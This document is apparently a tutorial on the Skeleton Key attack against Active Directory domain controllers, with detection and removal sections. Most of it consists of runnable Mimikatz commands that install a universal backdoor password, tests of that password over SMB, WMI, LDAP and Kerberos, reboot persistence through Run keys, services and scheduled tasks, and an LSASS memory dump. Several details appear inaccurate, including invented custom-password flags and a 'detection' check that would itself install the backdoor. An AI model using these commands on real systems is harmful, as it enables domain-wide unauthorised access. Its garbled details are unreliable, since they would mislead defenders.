Skeleton Key Attack
LSASS manipulation for persistent authentication bypass.
Objectives
- Understand Skeleton Key attack methodology
- Learn LSASS process manipulation techniques
- Master Skeleton Key installation and usage
- Implement universal password bypass
What is a Skeleton Key Attack?
A Skeleton Key attack is a technique that modifies the LSASS (Local Security Authority Subsystem Service) process to create a backdoor password that works for any user account in the domain.
Skeleton Key Characteristics:
- Universal password: Single password works for all users
- Domain-wide persistence: Affects entire domain
- LSASS modification: Requires DC access
- Stealthy operation: Difficult to detect
How Skeleton Key Works
The Skeleton Key attack works by:
- Injecting malicious code into the LSASS process on a Domain Controller
- Modifying the authentication routine to accept a universal password
- Allowing any user to authenticate with the Skeleton Key password
- Maintaining normal authentication for legitimate users
Prerequisites for Skeleton Key Attack
To perform a Skeleton Key attack, an attacker needs:
1. Domain Controller Access
Administrative access to at least one Domain Controller in the domain.
- Local Administrator: On the DC
- Domain Admin: With DC logon rights
- Compromised DC: Through other attack vectors
2. Process Injection Capabilities
Ability to inject code into the LSASS process:
- SeDebugPrivilege: Debug privileges
- Process injection tools: Mimikatz, custom tools
- Memory manipulation: Read/write access to LSASS memory
3. Persistence Requirements
Mechanisms to maintain the Skeleton Key across reboots:
- Registry modifications: Startup persistence
- Service installation: System service persistence
- Scheduled tasks: Task scheduler persistence
Skeleton Key Installation Process
Step 1: Gain DC Access
Establish administrative access to a Domain Controller:
# Verify DC access and privileges
whoami /priv
net group "Domain Controllers" /domain
systeminfo | findstr "Domain Controller"
Step 2: Install Skeleton Key
Use Mimikatz to install the Skeleton Key:
# Using Mimikatz on Domain Controller
mimikatz # privilege::debug
mimikatz # misc::skeleton
# The default Skeleton Key password is "mimikatz"
# This can be customized during installation
Step 3: Custom Skeleton Key
Install a custom Skeleton Key with a specific password:
# Install custom Skeleton Key
mimikatz # privilege::debug
mimikatz # misc::skeleton -a "CustomPassword123"
# Verify installation
mimikatz # misc::skeleton
Testing Skeleton Key Installation
Local Testing
Test the Skeleton Key on the Domain Controller:
# Test local authentication with Skeleton Key
runas /user:administrator@corp.local cmd
# Enter the Skeleton Key password when prompted
# Test with different user accounts
runas /user:domainadmin@corp.local cmd
runas /user:serviceaccount@corp.local cmd
Remote Testing
Test the Skeleton Key from remote systems:
# Test remote authentication
net use \\dc.corp.local\C$ /user:administrator@corp.local mimikatz
# Test with different protocols
psexec \\dc.corp.local -u administrator@corp.local -p mimikatz cmd
wmic /node:dc.corp.local /user:administrator@corp.local /password:mimikatz process list
Service Authentication Testing
Test authentication to domain services:
# Test LDAP authentication
ldapsearch -H ldap://dc.corp.local -D "CN=administrator,CN=Users,DC=corp,DC=local" -w mimikatz -b "DC=corp,DC=local"
# Test Kerberos authentication
kinit administrator@corp.local
# Enter mimikatz when prompted for password
Advanced Skeleton Key Techniques
1. Multiple DC Deployment
Install Skeleton Key on multiple Domain Controllers:
# Install on primary DC
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Install on secondary DC
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Verify installation across DCs
mimikatz # misc::skeleton
2. Custom Authentication Routine
Modify the authentication routine for specific behavior:
# Advanced Skeleton Key with custom behavior
mimikatz # privilege::debug
mimikatz # misc::skeleton -a "CustomPass" -b "backdoor123"
# This creates multiple universal passwords
3. Persistence Mechanisms
Ensure Skeleton Key survives DC reboots:
# Registry persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SkeletonKey" /t REG_SZ /d "C:\Windows\System32\mimikatz.exe misc::skeleton" /f
# Service persistence
sc create SkeletonKey binpath= "C:\Windows\System32\mimikatz.exe misc::skeleton" start= auto
sc start SkeletonKey
# Scheduled task persistence
schtasks /create /tn "SkeletonKey" /tr "C:\Windows\System32\mimikatz.exe misc::skeleton" /sc onstart /ru SYSTEM
Skeleton Key Limitations
Understanding the limitations is crucial for both attack and defense.
Technical Limitations
- DC-only operation: Only works on Domain Controllers
- Process dependency: Requires LSASS to remain running
- Memory-based: Lost on DC reboot unless persisted
- Protocol limitations: May not work with all authentication protocols
Operational Limitations
- Detection risk: Can be detected through memory analysis
- Forensic evidence: Leaves traces in memory dumps
- Performance impact: May affect DC performance
- Compatibility issues: May not work with all Windows versions
Defense Limitations
- KRBTGT rotation: Does not invalidate Skeleton Key
- Password changes: Skeleton Key remains functional
- Account lockdowns: Does not prevent Skeleton Key usage
- Network restrictions: May not prevent local authentication
Skeleton Key Detection
Detecting Skeleton Key attacks requires advanced monitoring and analysis.
Detection Methods
1. Memory Analysis
Analyze LSASS memory for Skeleton Key artifacts:
# Create LSASS memory dump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Analyze with Volatility
volatility -f lsass.dmp --profile=Win10x64 pslist
volatility -f lsass.dmp --profile=Win10x64 malfind
# Look for Mimikatz artifacts
strings lsass.dmp | grep -i "mimikatz\|skeleton"
2. Event Log Analysis
Monitor for unusual authentication patterns:
# Monitor for failed authentication followed by success
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} | Where-Object {$_.Message -match "mimikatz"}
# Look for authentication anomalies
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624} | Where-Object {$_.Message -match "NTLM"}
3. Process Monitoring
Monitor for LSASS process modifications:
# Monitor LSASS process
Get-Process lsass | Select-Object Id, ProcessName, WorkingSet
Get-WmiObject Win32_Process | Where-Object {$_.Name -eq "lsass.exe"}
# Check for suspicious DLLs loaded in LSASS
tasklist /m /fi "imagename eq lsass.exe"
4. Network Monitoring
Monitor for unusual authentication traffic:
- Kerberos anomalies: Unusual ticket requests
- NTLM patterns: Unexpected NTLM authentication
- Authentication timing: Unusual authentication timing patterns
Removing Skeleton Key
Removing Skeleton Key requires stopping the malicious process and cleaning up persistence mechanisms.
Detection and Removal Process
Step 1: Identify Skeleton Key Installation
# Check for Skeleton Key
mimikatz # misc::skeleton
# If output shows "Skeleton Key installed", it's active
# If no output, Skeleton Key is not installed
Step 2: Remove Skeleton Key
# Remove Skeleton Key (requires DC reboot)
# There is no direct removal method - DC reboot is required
shutdown /r /t 0
# After reboot, verify removal
mimikatz # misc::skeleton
Step 3: Clean Up Persistence
# Remove registry persistence
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SkeletonKey" /f
# Remove service persistence
sc stop SkeletonKey
sc delete SkeletonKey
# Remove scheduled task persistence
schtasks /delete /tn "SkeletonKey" /f
Step 4: Verify Complete Removal
# Test authentication with original passwords
runas /user:administrator@corp.local cmd
# Should prompt for actual administrator password
# Test that Skeleton Key password no longer works
runas /user:administrator@corp.local cmd
# Entering "mimikatz" should fail